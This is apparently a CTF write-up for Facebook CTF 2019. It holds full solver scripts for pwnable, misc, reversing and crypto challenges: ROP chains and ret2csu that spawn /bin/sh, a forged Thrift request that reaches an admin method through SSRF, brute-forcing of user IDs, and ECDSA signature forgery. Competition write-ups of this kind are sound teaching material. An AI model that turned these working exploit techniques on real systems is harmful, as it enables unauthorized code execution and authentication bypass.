Facebook CTF 2019 had been held from June 1st 00:00 UTC to June 2nd 00:00 UTC. I played this CTF as a member of zer0pts. We got 9372pts and reached 18th place. I solved several challs and gained 4718pts.

The CTF was pretty hard but I really enjoyed it. Thank you for holding such a nice CTF!

• [pwnable 100pts] overfloat
• [pwnable 410pts] otp_server
• [misc 100pts] homework_assignment_1337
• [reversing 100pts] imageprot
• [misc 896pts] evil
• [pwnable 494pts] rank
• [misc 961pts] whysapp
• [crypto 919pts] storagespace

The challenge tasks and my solvers are available here. And this is the python library used in my solvers.

[pwnable 100pts] overfloat

Description: nc challenges.fbctf.com 1341
File: overfloat.tar.gz

The binary has a stack overflow in the float array. We can simply overwrite the return address and do ROP since the SSP is disabled. I leaked the libc address in the 1st ROP and then went back to _start, and got the shell in the 2nd ROP.

from ptrlib import *
from struct import pack, unpack

elf = ELF("./overfloat")
libc = ELF("./libc-2.27.so")
#sock = Process("./overfloat")
sock = Socket("challenges.fbctf.com", 1341)

rop_pop_rdi = 0x00400a83
plt_puts = 0x400690

def rop(payload):
    for i in range(0x28 // 8 + 9):
        sock.recvuntil(": ")
        sock.sendline("3.14")
    for i in range(0, len(payload), 4):
        sock.recvuntil(": ")
        sock.sendline(repr(unpack('f', payload[i:i+4])[0]))
    sock.recvuntil(": ")
    sock.sendline("done")

# Stage 1
payload = p64(rop_pop_rdi)
payload += p64(elf.got("printf"))
payload += p64(plt_puts)
payload += p64(elf.symbol("_start"))
rop(payload)
sock.recvuntil("BON VOYAGE!\n")
addr_printf = u64(sock.recvline().rstrip())
libc_base = addr_printf - libc.symbol("printf")
dump("libc base = " + hex(libc_base))

# Stage 2
rop_pop_rax = libc_base + 0x000439c7
rop_pop_rsi = libc_base + 0x00023e6a
rop_pop_rdx = libc_base + 0x00001b96
rop_syscall = libc_base + 0x000013c0

payload = p64(rop_pop_rdi)
payload += p64(libc_base + next(libc.find("/bin/sh")))
payload += p64(rop_pop_rsi)
payload += p64(0)
payload += p64(rop_pop_rdx)
payload += p64(0)
payload += p64(rop_pop_rax)
payload += p64(59)
payload += p64(rop_syscall)
rop(payload)

sock.interactive()

Good.

$ python solve.py 
[+] Socket: Successfully connected to challenges.fbctf.com:1341
[ptrlib] libc base = 0x7f298264d000
[ptrlib]$ BON VOYAGE!
cat /home/overfloat/flag
[ptrlib]$ fb{FloatsArePrettyEasy...}

[pwnable 410pts] otp_server

Description: nc challenges.fbctf.com 1338
File: otp_server.tar.gz

We can set key and encrypt a message, which are located in the bss section. At first glance there seems no overflow. As I looked into the encryption function, I found the cause of the vulnerability lies in snprintf. It properly stores our input with maximum length 0x104. However, the return value of snprintf is not the size finally stored but the size we tried to store. Also, the buffer is right next to the key and we can coalesce those two regions. This means we can control the return value of snprintf between 0 to 0x204, which leads a buffer overread. Now we got the libc address, but how can we get the shell?

Using the same vulnerability, we can overwrite the return address. Although the nonce token is generated randomly, we can check it before exitting the main function. And we can overwrite the return address byte by byte. This method requires long time to finish the exploit, but I think it's the intended way.

from ptrlib import *

def set_key(key):
    sock.recvuntil(">>> ")
    sock.sendline("1")
    sock.recvline()
    sock.send(key)

def encrypt(msg):
    sock.recvuntil(">>> ")
    sock.sendline("2")
    sock.recvline()
    sock.send(msg)
    sock.recvline()
    return sock.recvline().rstrip()

libc = ELF("./libc-2.27.so")
#sock = Process("./otp_server")
sock = Socket("challenges3.fbctf.com", 1338)
delta = 0xe7

# Leak libc & canary
set_key("\xff" * 0x108)
result = encrypt("\xff" * 0x100)
canary = result[0x108:0x110]
addr_libc_start_main = u64(result[0x118:0x120])
libc_base = addr_libc_start_main - libc.symbol("__libc_start_main") - delta
dump("libc base = " + hex(libc_base))
dump(b"canary = " + canary)

def overwrite(pos, target):
    x = 0
    setFlag = True
    while True:
        if setFlag:
            setFlag = False
            set_key("A" * (0x18 + pos - x) + "\x00")
        nonce = u64(encrypt("A" * 0x100)[:4]) ^ 0x41414141
        if (target >> (8 * (7 - x))) & 0xff == nonce >> 24:
            print(hex(target), hex(nonce >> 8))
            setFlag = True
            x += 1
            if x == 8:
                break

rop_pop_rdi = libc_base + 0x0002155f
rop_pop_rsi = libc_base + 0x00023e6a
rop_pop_rax = libc_base + 0x000439c7
rop_ret = libc_base + 0x000008aa
rop_syscall = libc_base + 0x000013c0
overwrite(0x30, rop_syscall)
overwrite(0x28, 59)
overwrite(0x20, rop_pop_rax)
overwrite(0x18, 0)
overwrite(0x10, rop_pop_rsi)
overwrite(0x08, libc_base + next(libc.find("/bin/sh")))
overwrite(0x00, rop_pop_rdi)

#_ = input()
sock.sendline("3")
sock.interactive()

Thank you admins for preparing the server in Tokyo :)

$ python solve.py 
[+] Socket: Successfully connected to challenges3.fbctf.com:1338
[ptrlib] libc base = 0x7f1da9615000
[ptrlib] b'canary = \x00\xdd\xc1\xa1<X\x1f\x95'
0x7f1da96163c0 0x7186
0x7f1da96163c0 0x42f
0x7f1da96163c0 0x7f86c1
0x7f1da96163c0 0x1d1602
0x7f1da96163c0 0xa93e39
0x7f1da96163c0 0x610472
0x7f1da96163c0 0x631ad4
0x7f1da96163c0 0xc0757f
0x3b 0xe653
0x3b 0xaa15
0x3b 0x26b7
0x3b 0xf359
0x3b 0xea64
0x3b 0xfebf
0x3b 0x7d33
0x3b 0x3be623
0x7f1da96589c7 0x5efa
0x7f1da96589c7 0x606f
0x7f1da96589c7 0x7fb553
0x7f1da96589c7 0x1d5b94
0x7f1da96589c7 0xa9b825
0x7f1da96589c7 0x65be41
0x7f1da96589c7 0x890277
0x7f1da96589c7 0xc78c49
0x0 0x1704
0x0 0x84f5
0x0 0x4fe3
0x0 0x9d29
0x0 0x40cf
0x0 0xab08
0x0 0x9ff1
0x0 0xe7f2
0x7f1da9638e6a 0x3084
0x7f1da9638e6a 0x5b7d
0x7f1da9638e6a 0x7fb9e7
0x7f1da9638e6a 0x1df8d0
0x7f1da9638e6a 0xa91371
0x7f1da9638e6a 0x63ea9f
0x7f1da9638e6a 0x8eace3
0x7f1da9638e6a 0x6a0c1a
0x7f1da97c8e9a 0xc460
0x7f1da97c8e9a 0xc851
0x7f1da97c8e9a 0x7f005f
0x7f1da97c8e9a 0x1da11d
0x7f1da97c8e9a 0xa9d63c
0x7f1da97c8e9a 0x7cb6b2
0x7f1da97c8e9a 0x8e7195
0x7f1da97c8e9a 0x9a03e9
0x7f1da963655f 0x8b48
0x7f1da963655f 0xae89
0x7f1da963655f 0x7fbafa
0x7f1da963655f 0x1de4ef
0x7f1da963655f 0xa97bea
0x7f1da963655f 0x63ad41
0x7f1da963655f 0x658341
0x7f1da963655f 0x5fe3ba
[ptrlib]$ ----- END ROP ENCRYPTED MESSAGE -----
1. Set Key
2. Encrypt message
3. Exit
>>> [ptrlib]$ cat /home/otp_server/flag
fb{One_byte_aT_a_time}

[misc 100pts] homework_assignment_1337

Description: Your homework assignment this evening is to write a simple Thrift client.
Your client must call the ping method on the homework server challenges.fbctf.com:9090. The server allows you to check your work, try using the server to ping facebook.com or something.
The ping.thrift file is provided below.
File: homework_assignment_1337.tar.gz

We are given a thrift file. Let's use the PingBot.

if __name__ == '__main__':
    client = make_client(PingBot, "challenges.fbctf.com", 9090)
    arg = Ping(Proto.TCP, "facebook.com:80", "Hello")
    pong = client.ping(arg)
    print(pong)

Hmm, it seems a proxy rather than a echo server.

$ python solve.py 
Pong(code=0, data='HTTP/1.1 400 Bad Request\r\n')

The thrift file has a curious function that cannot be used.

  // You do not have to call this method as part of your homework.
  // I added this to check people's work, it is my admin interface so to speak.
  // It should only work for localhost connections either way, if your client
  // tries to call it, your connection will be denied, hahaha!
  PongDebug pingdebug(1:Debug dummy),

OK, so let's send a forgery packet of the PongDebug on the server.

from ptrlib import p32
import thriftpy
from thriftpy.rpc import make_client

ping = thriftpy.load(
    'ping.thrift', module_name="ping_thrift"
)
Ping = ping.Ping
Pong = ping.Pong
Debug = ping.Debug
PongDebug = ping.PongDebug
PingBot = ping.PingBot
Proto = ping.Proto

if __name__ == '__main__':
    client = make_client(PingBot, "challenges.fbctf.com", 9090)
    packet = b"\x80\x01\x00\x01"
    packet += p32(len("pingdebug"), order='big')
    packet += b"pingdebug"
    packet += b"\x00\x00\x00\x00\x0c\x00\x01\x08\x00\x01\x00\x00\x00\x7b\x00\x00"
    arg = Ping(Proto.TCP, "localhost:9090", packet)
    pong = client.ping(arg)
    print(pong)

Perfect!

$ python solve.py 
Pong(code=0, data=b'\x80\x01\x00\x02\x00\x00\x00\tpingdebug\x00\x00\x00\x00\x0c\x00\x00\x0f\x00\x01\x0c\x00\x00\x00\x02\x08\x00\x01\x00\x00\x00\x01\x0b\x00\x02\x00\x00\x00\x0elocalhost:9090\x0b\x00\x03\x00\x00\x00\x1f"fb{congr@ts_you_w1n_the_g@me}"\x00\x08\x00\x01\x00\x00\x00\x01\x0b\x00\x02\x00\x00\x00\x0elocalhost:9090\x0b\x00\x03\x00\x00\x00!\x80\x01\x00\x01\x00\x00\x00\tpingdebug\x00\x00\x00\x00\x0c\x00\x01\x08\x00\x01\x00\x00\x00{\x00\x00\x00\x00\x00')

[reversing 100pts] imageprot

Description: We have had some issues with profile photo theft as of late, so I built a proof of concept vault to store your pictures, it's so secure, even I don't know how to get the photo back out!
File: imageprot.tar.gz

It's an ELF binary written with Rust. I found something curious in the binary.

$ string imageprot -n 100 | less
/rustc/6c2484dc3c532c052f159264e970278d8b77cdc9/src/libcore/str/pattern.rs9fjfwCA9dx1pMmVgcW90aF11LQr1wSB4ZVhJRl8uY2MudQogICggIi81ICNfIF8hYC8KIKdJIHggLiJhIF4gRiIuIF8sCYAhICNcXzthIiwtLYJifCsvCiAhICAiXtwjICQgICAhOy8IaCAgICDfsV8YcEhPVDBcYk9QABMOECAYImtvJmQKCiAgICAVfxJtcEBhcG90IE3pMIbTryCSJMmgKcfC1mxQoMogMSgiaCxZIyF9IF0xYS0bId/kIGMgLiNlIV8hYSMvIF8sCiAgICBdXThkJysqJStqd9DrCpUwICIhI38iJCMlJSQkOy8LXSEiIyAkTVoyARFhJkx+aycCUTQSobGBaAFgk6EfWPHQBBNPT9kpfnN2aHZuBXsaBSMgFBUWFxgZGhxqa2hpF0Nqc3R1dnl/eXo8RDpGB0ZjSlNUVQpXVlsao9ql5qWmqdW+mbS1trfExqHCgYmIi4XI1YWduZSVlpeYmcbi4+Tl5ufo8uXY8/T19vf4hYXBwsPExbnI4snK0dLT1NXWl9rb2J
...
/VgHajKFLJ53yD6MimpC98gTOVxgr34zK9H9M5YDKEyFQxfJA8sC6UbF7Hc6ypKEvDjveeZw9I1ftUA7OaV+bgFwoPd6Z00XT/RX0N1VmiHrE/XtOkff+dqYDsNsDJgHupTWb7yxsyTOTNsEOmhSJ8RO2/FbfFlNKZaV78NbuNsnZxbwrkfWGBy5zkci8P9kp387vgPsTBfOo9lIDRxJSI2cyUKHnFlIDSHPHsz/i9Jc7lYldIw1TVAvRS5rc3d8jIBogTKK/YL6jmrEUjNbm16NF9xJToKcWU0IC1lOiIxZUogMWc6IA5pHiHf89H2d5ngKAWPrShI3q8lIoKgKgiCoHYIgqAqCIKgMQeooCoIgqAqdP2gKgiCoFUHqKAqCIKgKgiC4CgKgOAAIoKgKgiPvVEI1uVrWM30KnWfrQAigqAqCIKgKneMriQG/YoqCIKgKgaFoCp3gt8qSIyKKgiCoHYIjKJqCPygagqMoFUEqKAqCILcVRPCoicFj6JqVI2vAAiCoCoIgvwqCIKgH9/5

It seems to be a base64-encoded string of a big data. I extracted it and decoded the file.

$ hexdump -C pon | less
00000000  f5 f8 df c0 20 3d 77 1d  69 32 65 60 71 6f 74 68  |.... =w.i2e`qoth|
00000010  5d 75 2d 0a f5 c1 20 78  65 58 49 46 5f 2e 63 63  |]u-... xeXIF_.cc|
00000020  2e 75 0a 20 20 28 20 22  2f 35 20 23 5f 20 5f 21  |.u.  ( "/5 #_ _!|
00000030  60 2f 0a 20 a7 49 20 78  20 2e 22 61 20 5e 20 46  |`/. .I x ."a ^ F|
00000040  22 2e 20 5f 2c 09 80 21  20 23 5c 5f 3b 61 22 2c  |". _,..! #\_;a",|
00000050  2d 2d 82 62 7c 2b 2f 0a  20 21 20 20 22 5e dc 23  |--.b|+/. !  "^.#|
00000060  20 24 20 20 20 21 3b 2f  08 68 20 20 20 20 df b1  | $   !;/.h    ..|
00000070  5f 18 70 48 4f 54 30 5c  62 4f 50 00 13 0e 10 20  |_.pHOT0\bOP.... |
...

It has some string such as eXIF and pHOT0\bOP, which reminds me of JPEG header. I tried to find the XOR key of this file and found the first part to be like \n -=[ teapot ]=-\n\n but the key was too long to restore. Let's find the key in another way.

When I tried this challenge, @theoldmoon0602 had already found that the binary works if it could resolve challenges.fbctf.com. @theoldmoon0602 also found that the binary tries to access to http://challenges.fbctf.com:80/vault_is_intern. So, I added the following config to my /etc/hosts

127.0.0.1       challenges.fbctf.com

and set up the following simple server.

from flask import *

app = Flask(__name__)

@app.route('/vault_is_intern', methods=['GET'])
def vault():
    return "Hello, World"

if __name__ == '__main__':
    app.run(
        host = '0.0.0.0',
        port = '80',
        debug=True
    )

It seems it's working. (It quits when something like gdb is running on the machine.)

$ ./imageprot 
Welcome to our image verification and protection software!
This program ensures that malicious hackers cannot access our
secret images.
[+] Internal network connectivity verified.
[+] Image integrity verified, exiting.

I checked the packets in Wireshark and found a curious DNS packet.

It tries to access to httpbin.org...? I added the following line to /etc/hosts and run the binary again.

127.0.0.1       httpbin.org

$ ./imageprot 
Welcome to our image verification and protection software!
This program ensures that malicious hackers cannot access our
secret images.
[+] Internal network connectivity verified.
thread 'main' panicked at 'Failed to fetch URI: Error(Hyper(Error(Connect, Os { code: 111, kind: ConnectionRefused, message: "Connection refused" })), "https://httpbin.org/status/418")', src/libcore/result.rs:997:5
note: Run with `RUST_BACKTRACE=1` environment variable to display a backtrace.

Finally found the teapot!

$ curl https://httpbin.org/status/418

    -=[ teapot ]=-

       _...._
     .'  _ _ `.
    | ."` ^ `". _,
    \_;`"---"`|//
      |       ;/
      \_     _/
        `"""`

Let's restore the JPEG file.

with open("pon", "rb") as f:
    buf = f.read()

with open("key", "rb") as f:
    key = f.read()

for i in range(len(buf)):
    buf = buf[:i] + bytes([buf[i]^key[i%len(key)]]) + buf[i+1:]

with open("out", "wb") as f:
    f.write(buf)

Great!

[misc 896pts] evil

Description: I'm trying to break into the EVIL club and I've figured out their password. I still can't get in though because they now have a new secret evil handshake. I've attached what I captured from the old handshake, maybe it will help.
Server: nc 35.155.188.29 8000
File: evil.tar.gz

@st98 considered that this challenge might be related to the evil bit. So, I tried this one because I like the evil bits :)

The given pcap file has a TCP stream:

What's the secret password then?
The word of the day is lemons.
Every Villain Is Lemons
Welcome to the club evildoer

The packets don't have the evil bits set to 1. However, I found that every evil bit is set to 1 in the remote server.

So, let's set the evil bit to 1 and access to the server. I used this kernel module to modify the evil bit for every packet.

# lsmod | grep evil
evil                   16384  0
# nc 35.155.188.29 8000
So you know the evil handshake?
What's the secret password then?
The word of the day is loganberries.
Every Villain Is Loganberries
fb{th4t5_th3_3vi1est_th1ng_!_c4n_im4g1ne}

[pwnable 494pts] rank

Description: nc challenges.fbctf.com 1339
File: rank.tar.gz

There are 12 titles in the bss section but we can access to arbitrary range. In order to leak the libc address, I prepared the address to write@got in the buffer used in the user input.

# libc leak
payload = b"A" * 8 + p64(elf.got("write"))
evil_show(payload)
rank(0, (addr_buf - addr_list) // 8 + 1)
addr_write = u64(show()[0])
libc_base = addr_write - libc.symbol("write")
addr_one_gadget = libc_base + 0x10a38c
dump("libc base = " + hex(libc_base))

We also have arbitrary overwrite on the stack in the Rank function. It seems pretty easy to get the shell...? No. The problem is that the result of strtol is cast to int, which means we can write only 32-bit values. So, we can't call system("/bin/sh") directly.

Let's craft a ROP gadget. There may be useful ROP gadgets hopefully. I found some gadgets such as pop rdi;, pop rsi; pop r15; as usual. However, there is no gadget to set rdx like pop rdx;. We need to change rdx in order to call read(rdi, rsi, rdx); because rdx is set to 0 before exitting the main function.

Don't worry. I have another plan: ret2csu.

Even if we can't set rdi, rsi and rdx, we can use __libc_csu_init to call some functions with maximum 3 arguments. I called read(0, <strtol@got>, 8) to change strtol to system and then called _start. The last thing to do is send /bin/sh in the menu.

from ptrlib import *

def show():
    sock.recvuntil("> ")
    sock.sendline("1")
    ret = []
    for i in range(12):
        data = sock.recvline().rstrip().split(b". ")
        ret.append(data[1])
    return ret

def evil_show(fmt):
    sock.recvuntil("> ")
    sock.sendline(fmt)

def rank(i, pos):
    sock.recvuntil("> ")
    sock.sendline("2")
    sock.recvuntil("t1tl3> ")
    sock.sendline(str(i))
    sock.recvuntil("r4nk> ")
    sock.sendline(str(pos))

libc = ELF("./libc-2.27.so")
elf = ELF("./r4nk")
#sock = Process("./r4nk")
sock = Socket("challenges.fbctf.com", 1339)
addr_start = 0x400018 # address that points <start>
addr_list = 0x602080
addr_buf = 0x602100
plt_read = 0x4005f0
rop_pop_rdi = 0x00400b43
rop_pop_rsi_r15 = 0x00400b41
rop_prepare_reg = 0x00400b3a
rop_csu_init = 0x400b20

# libc leak
payload = b"A" * 8 + p64(elf.got("write"))
evil_show(payload)
rank(0, (addr_buf - addr_list) // 8 + 1)
addr_write = u64(show()[0])
libc_base = addr_write - libc.symbol("write")
addr_one_gadget = libc_base + 0x10a38c
dump("libc base = " + hex(libc_base))

# craft ROP chain
payload = [
    rop_prepare_reg,
    0,                 # rbx
    1,                 # rbp == rbx + 1
    elf.got("read"),   # r12 = &<func>
    0,                 # r13 = arg1
    elf.got("strtol"), # r14 = arg2
    0x8,               # r15 = arg3
    rop_csu_init,
    0xdeadbeef,
    0,          # rbx
    1,          # rbp == rbx + 1
    addr_start, # r12 = &<func>
    0,          # r13 = arg1
    0,          # r14 = arg2
    0,          # r15 = arg3
    rop_csu_init
]
for i, addr in enumerate(payload):
    assert 0 <= addr <= 0xffffffff
    rank(19 + i, addr)

# ROP it
sock.recvuntil("> ")
sock.sendline("3")

sock.send(p64(libc_base + libc.symbol("system")))

# get the shell!
sock.recvuntil("> ")
sock.sendline("/bin/sh\x00")

sock.interactive()

Cool!

$ python solve.py 
[+] Socket: Successfully connected to challenges.fbctf.com:1339
[ptrlib] libc base = 0x7f5a3050a000
[ptrlib]$ cat /home/r4nk/flag
[ptrlib]$ flag{wH0_n33ds_pop_rdx_4NYw4y}

[misc 961pts] whysapp

Description: We're working on a brand new sort of encrypted version of Whatsapp, we call it Whysapp. We took the base technology behind Whatsapp and upgraded it to use a super shiny new language.
File: whysapp.tar.gz

The server returns a base64-encoded string.

$ nc challenges.fbctf.com 4001
G+jdtmUJh5RurA2yk42yJlZRSIEZKcbWZ+49KB/uhJ4s7dqZiOUTdndHzpPeuG1hOvJUAro/1ob8
3RWUkHOui+X4jKyGxUhkfR/tg1el+9Q=

We are given a beam file of the Elixir language. I don't know of Elixir at all but could disassemble it just by following the steps in this article. Let's see how it works.

This is the recv function:

  {:function, :recv, 1, 20,
   [{:line, 19}, {:label, 19},
    {:func_info, {:atom, Whysapp}, {:atom, :recv}, 1}, {:label, 20},
    {:allocate, 1, 1}, {:move, {:integer, 0}, {:x, 1}},
    {:move, {:x, 0}, {:y, 0}}, {:line, 20},
    {:call_ext, 2, {:extfunc, :gen_tcp, :recv, 2}},
    {:test, :is_tagged_tuple, {:f, 21}, [{:x, 0}, 2, {:atom, :ok}]},
    {:get_tuple_element, {:x, 0}, 1, {:x, 0}}, {:line, 21},
    {:call_ext, 1, {:extfunc, :base64, :decode, 1}},
    {:move, {:literal, "yeetyeetyeetyeet"}, {:x, 1}}, {:move, {:x, 0}, {:x, 2}},
    {:move, {:atom, :aes_ecb}, {:x, 0}}, {:line, 22},
    {:call_ext, 3, {:extfunc, :crypto, :block_decrypt, 3}},
    {:move, {:literal, <<0>>}, {:x, 1}}, {:line, 23},
    {:call_ext, 2, {:extfunc, String, :trim_trailing, 2}},
    {:move, {:x, 0}, {:x, 1}}, {:move, {:y, 0}, {:x, 0}}, {:line, 24},
    {:call_ext_last, 2, {:extfunc, Whysapp, :process, 2}, 1}, {:label, 21},
    {:line, 20}, {:badmatch, {:x, 0}}]},

It uses AES ECB cipher with the key set to yeetyeetyeetyeet, and passes the decrypted data to process. I decrypted the packets with this key and found there are several types of messages such as cat:cat, math:53+72 and so on. I passed this message to the process function of Whysapp and found the following rule.

Given nessage	Message to send
msg:"X"	"random int":msg:"X"
cat:cat	"random int":cat:cat
ping:ping	"random int":ping:pong
math:"exp"	"random int":math:"evaluated exp"

I made the client and communicated with the server:

...
[ptrlib] <<< msg:I look at Google and think they have a strong academic culture. Elegant solutions to complex problems.
[ptrlib] >>>995757198:msg:I look at Google and think they have a strong academic culture. Elegant solutions to complex problems.
[ptrlib] <<< math:47*32
[ptrlib] >>>58844597:math:1504
[ptrlib] <<< You've exhausted your free messages limit. Only users with low IDs can communicate beyond this point.

Let's set the random id to 1.

[ptrlib] <<< math:26*19
[ptrlib] >>>1:math:494
[ptrlib] <<< math:82*24
[ptrlib] >>>1:math:1968
[ptrlib] <<< msg:I look at Google and think they have a strong academic culture. Elegant solutions to complex problems.
[ptrlib] >>>1:msg:I look at Google and think they have a strong academic culture. Elegant solutions to complex problems.
[ptrlib] <<< flag:Almost there. Only zuck can issue the flag command.

[ptrlib] >>>1:flag:Almost there. Only zuck can issue the flag command.

[ptrlib] <<< msg:You're not zuck!!!!!!!!

I had been stuck here and tried brute force.

...
[ptrlib] Attempt: 4
[ptrlib] fb{whys_app_when_you_can_whats_app}

Found the flag haha.

from Crypto.Cipher import AES
import base64
import random
from ptrlib import *

key = "yeetyeetyeetyeet"
crypto = AES.new(key, AES.MODE_ECB)

flag = False
def process(cipher, rid=1):
    global flag
    plain = crypto.decrypt(base64.b64decode(cipher)).rstrip(b"\x00")
    plain = bytes2str(plain)
    #dump("<<< " + plain)
    
    r = 0
    #r = random.randint(1, 1000000000)
    try:
        ope, data = plain.split(":")
    except:
        print(plain)
        exit()

    if flag and ope == 'msg':
        dump("Attempt: " + str(rid))
        if "You're not zuck!!!!!!!!" not in data:
            dump(data)

    if ope == 'math':
        # math
        result = eval(data)
        plain = "{}:{}:{}".format(r, "math", result)
    elif ope == 'ping':
        # ping
        plain = "{}:ping:pong".format(r)
    elif ope == 'flag':
        # flag
        plain = "{}:flag:{}".format(rid, data) # ?????
        flag = True
    else:
        # cats
        plain = "{}:{}".format(r, plain)
    #dump(">>>" + plain)
    
    plain += "\x00" * (16 - (len(plain) % 16))
    cipher = base64.b64encode(crypto.encrypt(plain))
    return cipher

log.level = ["warning"]
for r in range(0, 0x100000000):
    sock = Socket("challenges.fbctf.com", 4001)
    flag = False
    while True:
        c = sock.recv()
        if c is None:
            break
        s = process(c, r)
        sock.sendline(s)
    sock.close()

[crypto 919pts] storagespace

Description: In order to fit in with all the other CTFs out there, I've written a secure flag storage system!
It accepts commands in the form of json. For example: help(command="flag") will display help info for the flag command, and the request would look like:
{"command": "help", "params": {"command": "flag"}}
flag(name: Optional[str])
Retrieve flag by name.
{"command": "flag", "params": {"name": "myflag"}}
flag{this_is_not_a_real_flag}
You can access it at nc challenges.fbctf.com 8089
P.S. some commands require a signed request. The sign command will take care of that for you, but no way you'll convince me to sign the flag command xD
Server: nc challenges.fbctf.com 8089

We can issue some commands. First of all I wrote helper functions.

from ptrlib import *
import json
import base64
import re
from fastecdsa.curve import Curve
from fastecdsa.point import Point
import hashlib
import sys
import time

def sign(payload):
    sign_payload = {"command": "sign", "params":{
    "command": payload["command"], "params": payload["params"]
    }}
    sock.recv()
    sock.sendline(json.dumps(sign_payload))
    w = sock.recvline()
    s = json.loads(w.rstrip())
    return s

def info():
    payload = {"command": "info", "params": {}}
    payload["sig"] = sign(payload)["sig"]
    sock.recv()
    sock.sendline(json.dumps(payload))
    curve = sock.recvline().rstrip()
    generator = sock.recvline().rstrip()
    pubkey = sock.recvline().rstrip()
    r = re.findall(b"curve: y\*\*2 = x\*\*3 \+ (\d+)\*x \+ (\d+) \(mod (\d+)\)", curve)
    curve = (int(r[0][0]), int(r[0][1]))
    prime = int(r[0][2])
    r = re.findall(b"generator: \((\d+), (\d+)\)", generator)
    G = (int(r[0][0]), int(r[0][1]))
    r = re.findall(b"public key: \((\d+), (\d+)\)", pubkey)
    pubkey = (int(r[0][0]), int(r[0][1]))
    return curve, prime, G, pubkey

def spec(mode="all"):
    payload = {"command": "spec", "params": {"mode": mode}}
    payload["sig"] = sign(payload)["sig"]
    sock.sendline(json.dumps(payload))
    print(bytes2str(sock.recv()))
    print(bytes2str(sock.recv()))
    print(bytes2str(sock.recv()))
    exit()

def save(name, flag):
    payload = {"command": "save","params": {"name": name, "flag": flag}}
    payload["sig"] = sign(payload)["sig"]
    sock.recv()
    sock.sendline(json.dumps(payload))
    sock.recvuntil("flag stored\n")

def list():
    payload = {"command": "list", "params": {}}
    payload["sig"] = sign(payload)["sig"]
    sock.recv()
    sock.sendline(json.dumps(payload))
    res = sock.recv()
    return res.split(b"\n")[:-1]

list shows us that there is just one flag named fbctf. So, our goal is to issue {"command": "flag", "params": {"name": "fbctf"}} with a valid signature.

The server uses an elliptic curve to sign/verify a message.

The signature is generated like this:

( is a generator of and is the order of .) The server verifies a message like this:

The point is that the order of is so small that we can successfully calculate the discrete log problem. Let's make a fake signature for our new message.

If we can find such that , we can find for an arbitrary because holds. So, we just need to calculate . I divided the process into communication part (solve.py) and calculation part (solve.sage).

solve.py:

from ptrlib import *
import json
import base64
import re
from fastecdsa.curve import Curve
from fastecdsa.point import Point
import hashlib
import sys
import time

def sign(payload):
    sign_payload = {"command": "sign", "params":{
    "command": payload["command"], "params": payload["params"]
    }}
    sock.recv()
    sock.sendline(json.dumps(sign_payload))
    w = sock.recvline()
    s = json.loads(w.rstrip())
    return s

def info():
    payload = {"command": "info", "params": {}}
    payload["sig"] = sign(payload)["sig"]
    sock.recv()
    sock.sendline(json.dumps(payload))
    curve = sock.recvline().rstrip()
    generator = sock.recvline().rstrip()
    pubkey = sock.recvline().rstrip()
    r = re.findall(b"curve: y\*\*2 = x\*\*3 \+ (\d+)\*x \+ (\d+) \(mod (\d+)\)", curve)
    curve = (int(r[0][0]), int(r[0][1]))
    prime = int(r[0][2])
    r = re.findall(b"generator: \((\d+), (\d+)\)", generator)
    G = (int(r[0][0]), int(r[0][1]))
    r = re.findall(b"public key: \((\d+), (\d+)\)", pubkey)
    pubkey = (int(r[0][0]), int(r[0][1]))
    return curve, prime, G, pubkey

def spec(mode="all"):
    payload = {"command": "spec", "params": {"mode": mode}}
    payload["sig"] = sign(payload)["sig"]
    sock.sendline(json.dumps(payload))
    print(bytes2str(sock.recv()))
    print(bytes2str(sock.recv()))
    print(bytes2str(sock.recv()))
    exit()

def save(name, flag):
    payload = {"command": "save","params": {"name": name, "flag": flag}}
    payload["sig"] = sign(payload)["sig"]
    sock.recv()
    sock.sendline(json.dumps(payload))
    sock.recvuntil("flag stored\n")

def list():
    payload = {"command": "list", "params": {}}
    payload["sig"] = sign(payload)["sig"]
    sock.recv()
    sock.sendline(json.dumps(payload))
    res = sock.recv()
    return res.split(b"\n")[:-1]

if __name__ == '__main__':
    fake_payload = {"command": "flag", "params": {"name": "fbctf"}}
    fake_msg = json.dumps(fake_payload, sort_keys=True)
    
    sock = Socket("challenges.fbctf.com", 8089)
    sock.recvuntil("patience\n")
    param, n, G, H = info()
    curve = Curve(
        name = "taro",
        p = n,
        q = n,
        a = param[0],
        b = param[1],
        gx = G[0],
        gy = G[1]
    )
    G = Point(G[0], G[1], curve=curve)
    H = Point(H[0], H[1], curve=curve)
    dump("curve: y^2 = x^3 + {}x + {} mod {}".format(param[0], param[1], n))
    dump("G = ({}, {})".format(G.x, G.y))
    dump("H = ({}, {})".format(H.x, H.y))
    payload = {"command": "help", "params": {}}
    l = base64.b64decode(sign(payload)["sig"]).split(b"|")
    r, s = int(l[0]), int(l[1])
    dump("r, s = {}, {}".format(s, r))
    dump("new_msg = " + fake_msg)
    with open("input.txt", "w") as f:
        f.write("{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n".format(n, param[0], param[1], s, r, G.x, G.y, H.x, H.y))
    while True:
        try:
            sig = sys.stdin.readline().rstrip()
            if sig:
                break
        finally:
            time.sleep(1)
    dump("sig = " + sig)
    payload = {"command": "flag", "params": {"name": "fbctf"}, "sig": sig}
    sock.recv()
    sock.sendline(json.dumps(payload))
    print(sock.recv())
    
    sock.interactive()

solve.sage:

import hashlib
import base64
fake_msg = '{"command": "flag", "params": {"name": "fbctf"}}'

n = int(raw_input("n = "))
A = int(raw_input("A = "))
B = int(raw_input("B = "))
s = int(raw_input("s = "))
r = int(raw_input("r = "))
Gx = int(raw_input("Gx = "))
Gy = int(raw_input("Gy = "))
Hx = int(raw_input("Hx = "))
Hy = int(raw_input("Hy = "))

F = Zmod(n)
E = EllipticCurve(F, [A, B])
G = E.point((Gx, Gy))
H = E.point((Hx, Hy))

k = n - 314
Q = G * k
r = int(hashlib.sha256(fake_msg + str(Q[0])).hexdigest(), 16)
pub = discrete_log(H, G, operation='+')
assert r * H == pub * r * G
s = (k - pub * r) % E.order()
sig = base64.b64encode(str(r) + "|" + str(s))

print(pub)
print(Q)
print(s*G + r*H)
print(sig)

Terminal 1:

$ python client.py 
[+] Socket: Successfully connected to challenges.fbctf.com:8089
[ptrlib] curve: y^2 = x^3 + 130939496966954247505692064871042135207x + 135139266651492282791665127691622267381 mod 210608707847801565748958054867898833971
[ptrlib] G = (143417176998134602100619591422626758333, 130227579156607644879610759408262650788)
[ptrlib] H = (199079881625313231076143726873011934220, 137375402122334256318232545713548992134)
[ptrlib] r, s = 92207699106857002675556523714181963886, 79157924427059153781815650610767382592467279417582779601053359909339438719209
